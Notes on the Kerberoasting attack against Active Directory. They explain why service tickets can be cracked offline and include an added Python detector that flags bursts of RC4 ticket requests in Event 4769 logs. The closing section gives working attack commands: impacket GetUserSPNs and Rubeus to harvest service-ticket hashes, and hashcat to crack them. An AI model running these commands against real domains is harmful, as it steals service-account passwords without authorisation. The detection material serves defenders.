Kerberoasting
About the Attack
When a client requests a service ticket from the DC in order to access a resource hosted under an SPN, the DC performs no check on whether the requesting user is actually entitled to use that service before issuing the ticket, and the service ticket is encrypted using the SPN account's password hash. We obtain the ticket and brute-force the password hash offline, hence the name Kerberoasting.
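Because the DC hands a service ticket to any authenticated principal, the trace of this activity sits on the DC rather than on the victim service: every request is recorded as Security Event 4769 with the requesting account (TargetUserName), the service account (ServiceName), the source address and the TicketEncryptionType. The Python below is an added example, not part of these notes, and runs the usual detection heuristic over a constructed set of 4769 records: one account requesting tickets for many distinct user-account SPNs inside a short window, typically RC4-encrypted (0x17), which stands out in an environment that otherwise issues AES tickets. Threshold, window and all sample values are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security Event 4769 records (field names follow the
# EventData names of 4769; the accounts, hosts and times are invented).
SAMPLE_EVENTS = [
    # alice: normal activity, a TGT renewal and one AES ticket for a file server
    {"time": "2024-05-01T09:00:01", "TargetUserName": "alice@DOMAIN.COM",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    {"time": "2024-05-01T09:00:07", "TargetUserName": "alice@DOMAIN.COM",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    # carol: a few AES tickets for service accounts spread over half an hour
    {"time": "2024-05-01T09:05:00", "TargetUserName": "carol@DOMAIN.COM",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.9"},
    {"time": "2024-05-01T09:20:00", "TargetUserName": "carol@DOMAIN.COM",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.9"},
    {"time": "2024-05-01T09:35:00", "TargetUserName": "carol@DOMAIN.COM",
     "ServiceName": "svc_sap", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.9"},
    # bob: six RC4 tickets for six different service accounts within about a minute
    {"time": "2024-05-01T09:10:00", "TargetUserName": "bob@DOMAIN.COM",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.42"},
    {"time": "2024-05-01T09:10:05", "TargetUserName": "bob@DOMAIN.COM",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.42"},
    {"time": "2024-05-01T09:10:11", "TargetUserName": "bob@DOMAIN.COM",
     "ServiceName": "svc_sap", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.42"},
    {"time": "2024-05-01T09:10:18", "TargetUserName": "bob@DOMAIN.COM",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.42"},
    {"time": "2024-05-01T09:10:30", "TargetUserName": "bob@DOMAIN.COM",
     "ServiceName": "svc_ldap", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.42"},
    {"time": "2024-05-01T09:11:02", "TargetUserName": "bob@DOMAIN.COM",
     "ServiceName": "svc_print", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.42"},
]

# RC4-HMAC and RC4-HMAC-EXP; these are the ticket types worth cracking offline.
RC4_ETYPES = {"0x17", "0x18"}


def detect_kerberoast(events, min_services=5, window=timedelta(minutes=5)):
    """Return one alert per (account, source IP) that requested tickets for at
    least `min_services` distinct user service accounts inside `window`.
    Thresholds are assumptions; tune them to the environment's baseline."""
    by_key = defaultdict(list)
    for e in events:
        svc = e["ServiceName"]
        # TGT renewals and computer accounts ($) are not Kerberoast targets:
        # only user accounts with SPNs have human-chosen, crackable passwords.
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        by_key[(e["TargetUserName"], e["IpAddress"])].append(
            (datetime.fromisoformat(e["time"]), svc, e["TicketEncryptionType"].lower()))

    alerts = []
    for (account, ip), reqs in by_key.items():
        reqs.sort()  # chronological; tuples compare by timestamp first
        best = None
        for i in range(len(reqs)):  # slide a window starting at each request
            start = reqs[i][0]
            in_window = [r for r in reqs[i:] if r[0] - start <= window]
            services = {r[1] for r in in_window}
            if len(services) >= min_services and (
                    best is None or len(services) > len(best["services"])):
                best = {
                    "account": account,
                    "source_ip": ip,
                    "window_start": start.isoformat(),
                    "services": sorted(services),
                    "total_requests": len(in_window),
                    "rc4_requests": sum(1 for r in in_window if r[2] in RC4_ETYPES),
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(SAMPLE_EVENTS):
        print(f"ALERT {a['account']} from {a['source_ip']}: "
              f"{len(a['services'])} service accounts in one window, "
              f"{a['rc4_requests']}/{a['total_requests']} RC4 tickets")
```

Run against the constructed events the detector flags only bob (six distinct service accounts, all RC4, inside one window); alice's computer-account ticket and carol's three slow AES requests stay below the threshold. A real deployment reads the events from the DC's Security log or a SIEM rather than a list, and the RC4 count is the useful secondary signal: in a domain where service accounts have AES keys, RC4 tickets for user SPNs are rare enough to warrant a lower threshold.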
Gear Up (Prereqs)
We need the information below in order to perform this attack:
- User access, i.e. User:Password, an NT password hash, or a Kerberos ticket.
- Domain Controller IP
1. Using Kali Linux
This command is used when launching the attack from Kali Linux (a non-domain-joined host):
sudo impacket-getuserSPNs -request -dc-ip $IP domain.com/user -save -outputfile User_spn
2. Using Rubeus
rubeus.exe kerberoast /outfile:hashes.kerberoast
Crack the collected hashes
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
A custom rule set or any other suitable wordlist can also be used.